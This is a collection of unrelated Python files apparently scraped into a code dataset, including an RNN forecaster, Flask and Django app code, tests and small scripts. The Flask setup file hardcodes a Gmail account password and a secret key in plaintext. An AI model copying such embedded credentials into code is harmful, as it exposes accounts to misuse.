self.node_properties():\n for k in props:\n all_props.add(k)\n\n return all_props\n\n def _estimate_type_of_property_values(self):\n \"\"\"\n To create data from CSV we need to know the type of all node properties.\n\n This function tries to find the type and falls back to string if it's not consistent. 
For performance reasons\n this function is limited to the first 1000 nodes.\n\n :return:\n \"\"\"\n property_types = {}\n for p in self.all_properties_in_nodeset():\n this_type = None\n for node in self.nodes[:1000]:\n try:\n value = node[p]\n type_of_value = type(value)\n except KeyError:\n type_of_value = None\n\n if not this_type:\n this_type = type_of_value\n else:\n if this_type != type_of_value:\n this_type = str\n break\n\n property_types[p] = this_type\n\n return property_types\n\n def create_index(self, graph, database=None):\n \"\"\"\n Create indices for all label/merge ky combinations as well as a composite index if multiple merge keys exist.\n\n In Neo4j 3.x recreation of an index did not raise an error. In Neo4j 4 you cannot create an existing index.\n\n Index creation syntax changed from Neo4j 3.5 to 4. So far the old syntax is still supported. All py2neo\n functions (v4.4) work on both versions.\n \"\"\"\n if self.merge_keys:\n for label in self.labels:\n # create individual indexes\n for prop in self.merge_keys:\n create_single_index(graph, label, prop, database)\n\n # composite indexes\n if len(self.merge_keys) > 1:\n create_composite_index(graph, label, self.merge_keys, database)\n\n\ndef _read_nodes(csv_filepath, property_map):\n \"\"\"\n Instead of recreating the entire RelationShip set in memory this function yields\n one relationship at a time.\n\n :param csv_filepath: Path to the CSV file.\n :param property_map: Property map to rename properties.\n :return: One node property dict per iteration.\n \"\"\"\n\n if csv_filepath.endswith('.gz'):\n csvfile = gzip.open(csv_filepath, 'rt')\n else:\n csvfile = open(csv_filepath, newline='')\n lines = csvfile.readlines()\n csvfile.close()\n\n # get header line\n header = lines[0].strip().split(',')\n header = [x.replace('\"', '') for x in header]\n\n log.debug(f\"Header: {header}\")\n\n if property_map:\n log.debug(f\"Replace header {header}\")\n header = [property_map[x] if x in property_map else x for x in header]\n log.debug(f\"With header {header}\")\n\n nodes = []\n rdr = csv.DictReader(lines[1:], fieldnames=header)\n for node in rdr:\n nodes.append(node)\n\n return nodes\n\n\ndef _yield_node(csv_filepath, property_map):\n \"\"\"\n Instead of recreating the entire RelationShip set in memory this function yields\n one relationship at a time.\n\n :param csv_filepath: Path to the CSV file.\n :param property_map: Property map to rename properties.\n :return: One node property dict per iteration.\n \"\"\"\n\n if csv_filepath.endswith('.gz'):\n csvfile = gzip.open(csv_filepath, 'rt')\n else:\n csvfile = open(csv_filepath, newline='')\n\n # get header line\n header = None\n while not header:\n line = csvfile.readline()\n if not line.startswith('#'):\n header = line.strip().split(',')\n header = [x.replace('\"', '') for x in header]\n log.debug(f\"Header: {header}\")\n\n if property_map:\n log.debug(f\"Replace header {header}\")\n header = [property_map[x] if x in property_map else x for x in header]\n log.debug(f\"With header {header}\")\n\n rdr = csv.DictReader([row for row in csvfile if not row.startswith('#')], fieldnames=header)\n for node in rdr:\n yield node\n csvfile.close()","sub_path":"graphio/objects/nodeset.py","file_name":"nodeset.py","file_ext":"py","file_size_in_byte":18118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"512054008","text":"import asyncio\nfrom autobahn.asyncio.wamp import ApplicationSession\n\nclass MonitorComponent(ApplicationSession):\n \n 
async def onJoin(self, details):\n print(\"session ready\")\n \n def log(thing):\n print(str(thing))\n \n try:\n await self.register(log, u\"tirith.log\")\n print (\"procedure registered\")\n except Exception as e:\n print (\"could not register procedure: {0}\".format(e))","sub_path":"tirith/components/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"620444742","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader, random_split\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom rnn import RNN\nfrom torch_utils import NN, validation_regress\nfrom AMAL_tp4_datasets import DataHolder\n\n\n##############################################################################\n#### Networks\n##############################################################################\n\n## entrées sous forme length × batch × dim\n\nclass SequenceForecaster(nn.Module):\n def __init__(self, inDim, hidenDim, fc_layers, outDim):\n super().__init__()\n self.inDim, self.hidenDim, self.fc_layers , self.outDim = inDim, hidenDim, fc_layers, outDim\n\n self.rnn = RNN(inDim, hidenDim)\n self.fc = NN(hidenDim, outDim, fc_layers)\n\n def forward(self, x): ## x : batch*seq_len*inDim\n h = - torch.ones(self.hidenDim) ## valeur unique (donées normalisées entre 0 et 1)\n x = x.view(x.shape[0], x.shape[1], self.inDim)\n x.transpose_(0,1) ## now x : seq_len*batch*inDim\n x = self.rnn(x, h, many_to_many=True)\n x = self.fc(x)\n x.transpose_(0,1) ## now x : batch*seq_len*inDim\n return x\n\n\n\n##############################################################################\n#### main\n##############################################################################\n\nif __name__==\"__main__\":\n ## imports :\n from torch.utils.tensorboard import SummaryWriter\n import os\n import pickle as pkl\n\n ## load dataset temperatures :\n path=\"./tempAMAL_train.csv\"\n max_sample_length = 500\n train_batch = 100\n test_batch = 100\n\n max_num_city = 2\n one_city = False ## tels if temp curves are considered one by one or not\n\n data_holder = DataHolder(mega_sample_length=max_sample_length, train_val_test_split=(.6,.2,.2), path=path, max_num_city=max_num_city)\n print(data_holder.cities)\n\n def get_dataloaders(sample_length, strides):\n train_dataset, val_dataset, test_dataset = data_holder.get_datasets_forecast(sample_length, strides=strides, one_city=one_city)\n train_dataloader = DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=train_batch)\n val_dataloader = DataLoader( val_dataset, shuffle=True, drop_last=True, batch_size= test_batch)\n test_dataloader = DataLoader( test_dataset, shuffle=True, drop_last=True, batch_size= test_batch)\n return train_dataloader, val_dataloader, test_dataloader\n\n ## On commence par des s&quences courtes (3) :\n train_dataloader, val_dataloader, test_dataloader = get_dataloaders(10, strides=[5,10,10])\n if train_dataloader.__len__()==0 or test_dataloader.__len__()==0:\n raise AttributeError\n\n ## network definition :\n if not one_city:\n inDim = 3 + data_holder.get_num_classes() # température * month * day * hour\n else:\n inDim = 3 + 1\n outDim = inDim\n hidenDim = 35#2*outDim\n fc_layers = [] #[2*outDim]\n net = SequenceForecaster(inDim=inDim, hidenDim=hidenDim, outDim=outDim, fc_layers=fc_layers)\n loss_func = nn.MSELoss()\n\n ## optimizer :\n optimizer = torch.optim.Adam(params=net.parameters(), 
lr=0.005, betas=(.9, .999), eps=10**-8)\n #optimizer = torch.optim.SGD(params=net.parameters() , lr=.01, momentum=.9)\n\n ## display params :\n N = 10000\n loss_freq = 1 # in number of epochs\n save_model_freq= 1\n histogram_freq = 1\n test_freq = 1\n\n ## Savers :\n ONLY_SAVE_BEST_MODEL = True\n writer = SummaryWriter()\n MODEL_SAVE_PATH = 'best_model.pkl'\n print(MODEL_SAVE_PATH)\n if os.path.isfile(MODEL_SAVE_PATH):\n with open(MODEL_SAVE_PATH, 'rb') as f:\n SAVED_MODEL = pkl.load(f)\n net.load_state_dict(SAVED_MODEL['params'], strict=True)\n optimizer.load_state_dict(SAVED_MODEL['optimizer'])\n print('model loaded from \"{}\"\\nepoch = {}, test loss = {}\\n'.format(MODEL_SAVE_PATH, SAVED_MODEL['epoch'], SAVED_MODEL['loss_test']))\n else:\n SAVED_MODEL = {'loss_test':None, 'epoch':0}\n print('no best model found at \"{}\"\\n'.format(MODEL_SAVE_PATH))\n\n\n ## Training loop :\n for i in tqdm(range(SAVED_MODEL['epoch'], N), desc='epochs'):\n ## test network :\n if i%test_freq==0 or i%save_model_freq==0:\n loss_test = validation_regress(net, test_dataloader, loss_func)\n writer.add_scalars('loss', {'test': loss_test}, i)\n writer.flush()\n ## save best model :\n if i%save_model_freq==0 and (not ONLY_SAVE_BEST_MODEL or SAVED_MODEL['loss_test'] is None or SAVED_MODEL['loss_test']>loss_test):\n SAVED_MODEL['epoch'] = i\n SAVED_MODEL['loss_test'] = loss_test\n SAVED_MODEL['params'] = net.state_dict()\n SAVED_MODEL['optimizer'] = optimizer.state_dict()\n with open(MODEL_SAVE_PATH, 'wb') as f:\n pkl.dump(SAVED_MODEL, f)\n SAVED_MODEL['params'] = None # useless to keep the weights in memory\n print('\\nepoch {} : new model saved\\n'.format(i))\n\n ## train (one epoch) :\n optimizer.zero_grad()\n loss_train = 0.\n num_batchs = 0.\n for x, y_target in tqdm(train_dataloader, desc='train'):\n y = net(x)\n loss = loss_func(y, y_target)\n loss.backward()\n optimizer.step()\n loss_train += loss.item()\n num_batchs += 1\n\n if i%loss_freq==0:\n loss_train /= num_batchs\n writer.add_scalars('loss', {'train': loss_train}, i)\n\n if i%histogram_freq==0:\n ## On enregistre les gradients à différentes couches pour constater si ils se propagent bien ou non :\n writer.add_histogram('weights/fi', net.rnn.fi.weight, i)\n writer.add_histogram('weights/fh', net.rnn.fh.weight, i)\n writer.add_histogram( 'grads/fi', net.rnn.fi.weight.grad, i)\n writer.add_histogram( 'grads/fh', net.rnn.fh.weight.grad, i)\n writer.add_histogram('outputs', y, i)\n\n writer.close()\n","sub_path":"code_guetschel/AMAL_tp4_forecasting.py","file_name":"AMAL_tp4_forecasting.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"182507532","text":"\n\n#Runtime: 76 ms, faster than 28.95% of Python3 online submissions for ZigZag Conversion.\n#Memory Usage: 14.4 MB, less than 45.55% of Python3 online submissions for ZigZag Conversion.\n\n# Time Constant: O(n+k) where n = number of characters in the string and k is the number of rows. However, since k < n, therefore O(n+k < n+n) that is O(n+k < 2n).\n# Therefore, Time Constant: O(n)\n# Space Constant: O(n)\n\ndef solution1(s, numRows):\n '''\n 1. Base case: If the numRows mentioned is 1, that means there is just one row, which will be the string itself. Also, if the numRows >= the string, then each row will just have 1 character, and since each row is appended to each other, it will print out the string as well.\n 2. Let us consider each row to be a list. 
So basically, PAYPALISHIRING with numRows = 3 would become:\n [PAHN]\n [APLSIIG]\n [YIR]\n 3. We would be traversing the string and insert each character from the 0th list to the nth list.\n 4. Once we reach the nth list, we must now traverse back to list 0. Starting from list n-1 we must put one character into each list.\n 5. Now we will be having numRows rows filled with characters. We must traverse every row from first to last, and append each row to the previour row.\n '''\n\n #1. Base case: If the numRows mentioned is 1, that means there is just one row, which will be the string itself. Also, if the numRows >= the string, then each row will just have 1 character, and since each row is appended to each other, it will print out the string as well.\n if numRows == 1 or numRows >= len(s):\n return s\n #2. Create a list for each row given\n row = [[] for i in range(numRows)]\n #store the count of which row we are on so that we can append that row with a character\n rowCount = 0\n #flag indicates whether we are travelling down from 0 to n or up from n-1 to 0.\n flag = 1\n #3. We would be traversing the string and insert each character from the 0th list to the nth list.\n for character in s:\n row[rowCount].append(character)\n rowCount += flag\n #4. Once we reach the end of the row list (either start of the list or the end) we must now reverse our path and go to the opposite direction. \n if rowCount == 0 or rowCount == numRows-1:\n flag *= -1\n \n #5. We now have numRows rows filled with characters. We must convert each row into a string and append the string to the previous row\n for i in range(len(row)):\n row[i] = ''.join(row[i])\n return ''.join(row)\n","sub_path":"Medium/6. ZigZag Conversion/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"416359069","text":"from datetime import datetime, timedelta\nimport random\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom pm.models import Offer, Deal\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n # get offers\n offers = Offer.objects.all()\n for offer in offers:\n\n # create deal\n sr = random.choice(range(-20, 100))\n start = datetime.now() - timedelta(days=sr)\n sr = random.choice(range(-20, 100))\n stop = datetime.now() + timedelta(days=sr)\n if stop < start:\n start, stop = stop, start\n deal = Deal(\n title=offer.name,\n customer_chooses=bool(len(offer.products.all()) > 1),\n starts_on=start,\n ends_on=stop,\n initial_position=random.choice(range(1, 100)),\n current_position=random.choice(range(1, 100))\n )\n try:\n deal.save()\n self.stdout.write('created deal: %s' % str(deal))\n except IntegrityError as e:\n self.stderr.write(str(e))\n continue\n\n # attach offer to deal\n deal.offers.add(offer)\n self.stdout.write('attached offer: %s' % str(offer))\n","sub_path":"pm/management/commands/mass-produce-deals.py","file_name":"mass-produce-deals.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578323376","text":"import csv\n\n# 문자열(string)을 아이템으로 갖는 리스트\nrow1 = ['test1', 'success', 'Mon']\nrow2 = ['test2', 'failure, kind of', 'Tue']\nrow3 = ['test3', 'success, kind of', 'Wed']\nresult = [row1, row2, row3]\nprint(result)\n\n# 파일을 쓰기 모드로 열기\n# csv 파일을 쓸(write) 때는 불필요한 라인이 쓰이지 않도록 하기 위해 오픈 시 newline='' 파라미터를 추가\nwith 
open('test_result.csv', mode='w', encoding='UTF-8', newline='') as f:\n # csv writer 객체 생성\n writer = csv.writer(f, delimiter=',')\n for row in result:\n # writer 객채의 writerow() 메소드를 이용해서 한줄씩 쓰기\n writer.writerow(row)\n\n# csv 모듈을 사용하지 않고 csv 파일을 읽었을 때 문제점\nwith open('test_result.csv', mode='r', encoding='UTF-8') as f:\n for line in f:\n print(line.strip().split(','))\n # 'failure, kind of'라는 하나의 문자열이\n # 'failure'와 'kind of'라는 두 개의 문자열로 조개짐\n # 원래 데이터에 없어야 할 ''가 문자열에 포함됨\n\nprint('\\ncsv 모듈을 사용할 때')\nwith open('test_result.csv', mode='r', encoding='UTF-8') as f:\n # csv reader 객체를 생성\n reader = csv.reader(f)\n for row in reader:\n # reader 객체의 read 기능을 이용해서 한줄씩 읽음\n print(row)\n","sub_path":"scratch09/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460506100","text":"#MUSKAN BAGRECHA\r\nimport random\r\ndef rps():\r\n L = [\"rock\", \"paper\", \"scissors\"]\r\n ctrcomp=0\r\n ctrplayer=0\r\n while True:\r\n a=int(input(\"Do you want to play? Type 1 for yes, 0 for no\"))\r\n if a==0:\r\n print(\"THANK YOU\")\r\n print(\"Scorecard is as follows: You={} and computer={}\".format(ctrplayer, ctrcomp))\r\n if ctrcomp==ctrplayer:\r\n print(\"It's a tie\")\r\n elif ctrcomp>ctrplayer:\r\n print(\"Uh-oh! You lose. Better luck next time :)\")\r\n else:\r\n print(\"Congratulations!! You won\")\r\n break\r\n else:\r\n choice = input(\"rock, paper or scissors?\")\r\n opponent=random.choice(L)\r\n print(\"Computer: \", opponent)\r\n if choice == opponent:\r\n print(\"Tie\")\r\n elif (choice==\"rock\" and opponent=='paper') or (choice=='paper' and opponent=='scissors') or (choice=='scissors' and opponent=='rock'):\r\n print(\"Computer gets the point\")\r\n ctrcomp+=1\r\n else:\r\n print(\"You get the point\")\r\n ctrplayer+=1\r\n \r\n#MAIN\r\nrps()\r\n","sub_path":"ROCKPAPERSCISSORS.py","file_name":"ROCKPAPERSCISSORS.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"104319724","text":"## set up of our db file\n\nimport os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom flask_cors import CORS\nfrom flask_mail import Mail,Message\nfrom flask_admin import Admin\n\n\n\nlogin_manager=LoginManager()\n\napp=Flask(__name__)\n\n# admin=Admin(app)\nlogin=LoginManager(app)\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = 'fypmailing@gmail.com'\napp.config['MAIL_PASSWORD'] = 'project2019'\napp.config['SECRET_KEY'] = 'mysecretkey'\n\nmail = Mail(app)\n\n\n\nAPP_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nPROFILE_FOLDER = os.path.join(APP_ROOT,'profilephotos')\nUPLOAD_FOLDER = os.path.join(APP_ROOT,'uploads') \nEXCEL_FOLDER = os.path.join(APP_ROOT,'exports')\n\napp.config['PROFILE_FOLDER'] = PROFILE_FOLDER\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['EXCEL_FOLDER'] = EXCEL_FOLDER\n\n\n\nCORS(app)\n\n################# SQL DATABASE SECTION ##########\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///'+os.path.join(basedir,'data.sqlite')\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] =False\n\ndb = SQLAlchemy(app)\n\nMigrate(app,db)\n\nlogin_manager.init_app(app)\n\nlogin_manager.login_view 
='login'\n","sub_path":"back-end/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"396809692","text":"from flask import render_template, flash, redirect, url_for\n\n\nfrom .forms import ProductForm\nfrom app import db\nfrom app.models import Product\n\nfrom . import products\n\n@products.route('/', methods=['GET', 'POST'])\ndef list_products():\n\n prods = Product.query.all()\n\n return render_template('products/index.html',\n prods=prods, title=\"Products\")\n\n\n@products.route('/add', methods=['GET', 'POST'])\ndef add_product():\n add_product = True\n\n form = ProductForm()\n if form.validate_on_submit():\n product = Product(name=form.name.data,\n description=form.description.data)\n try:\n # add product to the database\n db.session.add(product)\n db.session.commit()\n except:\n # in case product name already exists\n flash('Error: product name already exists.')\n\n # redirect to products page\n return redirect(url_for('products.list_products'))\n\n # load product template\n return render_template('products/product.html', action=\"Add\",\n add_product=add_product, form=form,\n title=\"Add Product\")\n\n\n@products.route('/edit/', methods=['GET', 'POST'])\ndef edit_product(id):\n add_product = False\n\n product = Product.query.get_or_404(id)\n form = ProductForm(obj=product)\n if form.validate_on_submit():\n product.name = form.name.data\n product.description = form.description.data\n db.session.commit()\n flash('You have successfully edited the product.')\n\n # redirect to the departments page\n return redirect(url_for('products.list_products'))\n\n form.description.data = product.description\n form.name.data = product.name\n return render_template('products/product.html', action=\"Edit\",\n add_department=add_product, form=form,\n product=product, title=\"Edit Product\")\n\n\n@products.route('/delete/', methods=['GET', 'POST'])\ndef delete_product(id):\n product = Product.query.get_or_404(id)\n db.session.delete(product)\n db.session.commit()\n flash('You have successfully deleted the product.')\n\n # redirect to the products page\n return redirect(url_for('products.list_products'))\n\n return render_template(title=\"Delete Product\")","sub_path":"app/controllers/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"610014113","text":"##Builds Fermentor Graphical Plugin\nimport os, sys, string\nimport SConsAddons.Util as sca_util\nimport distutils.util\npj = os.path.join\n\nhost_type = distutils.util.get_platform()\n\nImport( 'baseEnv ves_pkg buildDir RootDir osgworks_options gmtl_options vrjuggler_options osg_options osgal_options xerces_options vtk_options GetPlatform' )\nImport('switchwire_options poco_options')\n\nopenDir = os.path.abspath( pj( RootDir, 'share', 'examples', 'input_animation', 'animationGP' ) )\nsources = sca_util.getSourcesRecursive( openDir )\nheaders = sca_util.getHeadersRecursive( openDir )\n\nlib_env = ves_pkg.getEnv().Clone()\nlib_env.Append( LIBS = [ 'ves_open_xml',\n 'ves_xplorer',\n 'ves_xplorer_scenegraph' ] )\nlib_env.Append( LIBPATH = [ pj( '#', buildDir, 'src', 'ves', 'open', 'xml' ),\n pj( '#', buildDir, 'src', 'ves', 'xplorer' ),\n pj( '#', buildDir, 'src', 'ves', 'xplorer', 'scenegraph' ) ] )\nlib_env.Append( CPPDEFINES = [ 'VE_USER_PLUGIN_LIBRARY' ] )\nif GetPlatform() == 
'win32':\n lib_env['no_import_lib'] = 1\n #lib_env['SHLINKFLAGS'] = '$LINKFLAGS /dll /MANIFEST:NO'\n lib_env['WINDOWS_INSERT_MANIFEST'] = False\n\ngmtl_options.apply( lib_env )\nvrjuggler_options.apply( lib_env )\nosg_options.apply( lib_env )\nif osgal_options.isAvailable():\n osgal_options.apply( lib_env )\n lib_env.Append( CPPDEFINES = [ 'VE_SOUND' ] )\nxerces_options.apply( lib_env )\nvtk_options.apply( lib_env )\nosgworks_options.apply( lib_env )\nswitchwire_options.apply( lib_env )\npoco_options.apply( lib_env )\n\nlib = ves_pkg.createLoadableModule( 'VEAnimationGraphicalPlugin', lib_env,\n installPrefix = pj( 'share', 'vesuite', 'examples', 'input_animation', 'Plugins', 'GE', host_type ) ) \n\nlib.addSources( sources )\nlib.build()\n","sub_path":"share/examples/input_animation/animationGP/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"395152877","text":"\"\"\"Tests for the switch entity.\"\"\"\r\nfrom unittest import IsolatedAsyncioTestCase\r\nfrom unittest.mock import AsyncMock, patch\r\n\r\nfrom homeassistant.components.switch import DEVICE_CLASS_OUTLET\r\nfrom homeassistant.const import STATE_UNAVAILABLE\r\n\r\nfrom custom_components.tuya_local.generic.switch import TuyaLocalSwitch\r\nfrom custom_components.tuya_local.helpers.device_config import TuyaDeviceConfig\r\n\r\nfrom ..const import KOGAN_SOCKET_PAYLOAD\r\nfrom ..helpers import assert_device_properties_set\r\n\r\nSWITCH_DPS = \"1\"\r\nTIMER_DPS = \"2\"\r\nCURRENT_DPS = \"4\"\r\nPOWER_DPS = \"5\"\r\nVOLTAGE_DPS = \"6\"\r\n\r\n\r\nclass TestKoganSwitch(IsolatedAsyncioTestCase):\r\n def setUp(self):\r\n device_patcher = patch(\"custom_components.tuya_local.device.TuyaLocalDevice\")\r\n self.addCleanup(device_patcher.stop)\r\n self.mock_device = device_patcher.start()\r\n cfg = TuyaDeviceConfig(\"kogan_switch.yaml\")\r\n switch = cfg.primary_entity\r\n self.switch_name = switch.name\r\n self.subject = TuyaLocalSwitch(self.mock_device(), switch)\r\n self.dps = KOGAN_SOCKET_PAYLOAD.copy()\r\n\r\n self.subject._device.get_property.side_effect = lambda id: self.dps[id]\r\n\r\n def test_should_poll(self):\r\n self.assertTrue(self.subject.should_poll)\r\n\r\n def test_name_returns_device_name(self):\r\n self.assertEqual(self.subject.name, self.subject._device.name)\r\n\r\n def test_friendly_name_returns_config_name(self):\r\n self.assertEqual(self.subject.friendly_name, self.switch_name)\r\n\r\n def test_unique_id_returns_device_unique_id(self):\r\n self.assertEqual(self.subject.unique_id, self.subject._device.unique_id)\r\n\r\n def test_device_info_returns_device_info_from_device(self):\r\n self.assertEqual(self.subject.device_info, self.subject._device.device_info)\r\n\r\n def test_device_class_is_outlet(self):\r\n self.assertEqual(self.subject.device_class, DEVICE_CLASS_OUTLET)\r\n\r\n def test_is_on(self):\r\n self.dps[SWITCH_DPS] = True\r\n self.assertTrue(self.subject.is_on)\r\n\r\n self.dps[SWITCH_DPS] = False\r\n self.assertFalse(self.subject.is_on)\r\n\r\n def test_is_on_when_unavailable(self):\r\n self.dps[SWITCH_DPS] = None\r\n self.assertEqual(self.subject.is_on, STATE_UNAVAILABLE)\r\n\r\n async def test_turn_on(self):\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: True}\r\n ):\r\n await self.subject.async_turn_on()\r\n\r\n async def test_turn_off(self):\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: False}\r\n ):\r\n 
await self.subject.async_turn_off()\r\n\r\n async def test_toggle_turns_the_switch_on_when_it_was_off(self):\r\n self.dps[SWITCH_DPS] = False\r\n\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: True}\r\n ):\r\n await self.subject.async_toggle()\r\n\r\n async def test_toggle_turns_the_switch_off_when_it_was_on(self):\r\n self.dps[SWITCH_DPS] = True\r\n\r\n async with assert_device_properties_set(\r\n self.subject._device, {SWITCH_DPS: False}\r\n ):\r\n await self.subject.async_toggle()\r\n\r\n def test_current_power_w(self):\r\n self.dps[POWER_DPS] = 1234\r\n self.assertEqual(self.subject.current_power_w, 123.4)\r\n\r\n def test_device_state_attributes_set(self):\r\n self.dps[TIMER_DPS] = 1\r\n self.dps[VOLTAGE_DPS] = 2350\r\n self.dps[CURRENT_DPS] = 1234\r\n self.dps[POWER_DPS] = 5678\r\n self.assertCountEqual(\r\n self.subject.device_state_attributes,\r\n {\r\n \"timer\": 1,\r\n \"current_a\": 1.234,\r\n \"voltage_v\": 235.0,\r\n \"current_power_w\": 567.8,\r\n },\r\n )\r\n\r\n self.dps[TIMER_DPS] = 0\r\n self.dps[CURRENT_DPS] = None\r\n self.dps[VOLTAGE_DPS] = None\r\n self.dps[POWER_DPS] = None\r\n self.assertCountEqual(\r\n self.subject.device_state_attributes,\r\n {\r\n \"timer\": 0,\r\n \"current_a\": None,\r\n \"voltage_v\": None,\r\n \"current_power_w\": None,\r\n },\r\n )\r\n\r\n async def test_update(self):\r\n result = AsyncMock()\r\n self.subject._device.async_refresh.return_value = result()\r\n\r\n await self.subject.async_update()\r\n\r\n self.subject._device.async_refresh.assert_called_once()\r\n result.assert_awaited()\r\n","sub_path":"tests/devices/test_kogan_switch.py","file_name":"test_kogan_switch.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461060894","text":"import serial\nimport time\nimport sys\nimport sqlite3\nimport os.path\nimport re\n\nser = serial.Serial('/dev/ttyUSB0', 9600) # set up for serial read\ntime.sleep(2)\n\ncounter = 0\nwhile 1: # repeatedly parse for incoming data\n connection = sqlite3.connect('xbee.db') # connect to local db\n db = connection.cursor()\n data = ''\n curr_e = time.localtime()\n curr_t = int(time.strftime(\"%H%M%S\", curr_e)) #timestamp\n data = ser.readline() # reading data from router\n data = data.decode().strip('\\r\\n')\n if data.find('PPM') >= 0: # airquality data\n aq = int(data[0]) * 10 + int(data[1])\n else: # mac address data\n dev = int(data[0]) * 10 + int(data[1])\n if counter % 2 == 0 and counter != 0:\n print(curr_e)\n db.execute(\"INSERT INTO sensordata(devices, airquality, time) VALUES({},{},{})\".format(dev,aq,curr_t)) # write to DB\n\n connection.commit()\n connection.close()\n counter += 1\n","sub_path":"web_server/serial_read.py","file_name":"serial_read.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"62107583","text":"import datetime\nimport os\nimport sys\n\nfrom send2trash import send2trash\nfrom setproctitle import setproctitle\n\n\ndef remove_folders(path, removeRoot=True):\n \"\"\"Removes empty folders\"\"\"\n if not os.path.isdir(path):\n return\n\n # remove empty subfolders\n files = os.listdir(path)\n if len(files):\n for f in files:\n fullpath = os.path.join(path, f)\n if os.path.isdir(fullpath):\n remove_folders(fullpath)\n\n # if folder empty, delete it\n files = os.listdir(path)\n if len(files) == 0 and removeRoot:\n print(\"Removing empty folder:\", path)\n 
os.rmdir(path)\n\n\ndef main():\n setproctitle('Directory Cleaner')\n\n dir_to_search = sys.argv[1]\n for dirpath, dirnames, filenames in os.walk(dir_to_search):\n for file in filenames:\n curpath = os.path.join(dirpath, file)\n file_modified = datetime.datetime.fromtimestamp(\n os.path.getmtime(curpath))\n if datetime.datetime.now() - file_modified > datetime.timedelta(\n hours=72):\n # os.remove(curpath)\n send2trash(curpath)\n\n remove_folders(dir_to_search, False)\n","sub_path":"directory_cleaner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"605162973","text":"from __future__ import absolute_import, unicode_literals\nfrom string import Template as str_Template\n\nfrom celery import shared_task\n\nfrom django.core.mail import send_mail\n\n@shared_task\ndef chat_mail_note(username, chat_name, target_mail):\n send_mail(\n 'You created a new chat',\n str_Template(\n 'Hello $username,\\n\\n you have created a new chat named $chat'\n ).substitute(username=username, chat=chat_name),\n 'from@no.one',\n [target_mail]\n )\n\n","sub_path":"messanger/chats/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"237214825","text":"from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer\nfrom PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle\n\nclass ttHFastLepSkimmer( Analyzer ):\n def __init__(self, cfg_ana, cfg_comp, looperName ):\n super(ttHFastLepSkimmer,self).__init__(cfg_ana,cfg_comp,looperName)\n self.muIdCut = self.cfg_ana.muCut\n self.eleIdCut = self.cfg_ana.eleCut\n\n def declareHandles(self):\n super(ttHFastLepSkimmer, self).declareHandles()\n self.handles['muons'] = AutoHandle(self.cfg_ana.muons,\"std::vector<pat::Muon>\") \n self.handles['electrons'] = AutoHandle(self.cfg_ana.electrons,\"std::vector<pat::Electron>\") \n\n def beginLoop(self, setup):\n super(ttHFastLepSkimmer,self).beginLoop(setup)\n self.counters.addCounter('events')\n self.count = self.counters.counter('events')\n self.count.register('all events')\n self.count.register('accepted events')\n\n\n def process(self, event):\n self.readCollections( event.input )\n self.count.inc('all events')\n \n leptons = 0\n\n for el in self.handles['electrons'].product():\n if self.eleIdCut(el): leptons += 1\n\n for mu in self.handles['muons'].product():\n if self.muIdCut(mu): leptons += 1\n\n if leptons >= self.cfg_ana.minLeptons:\n self.count.inc('accepted events')\n return True\n\n return 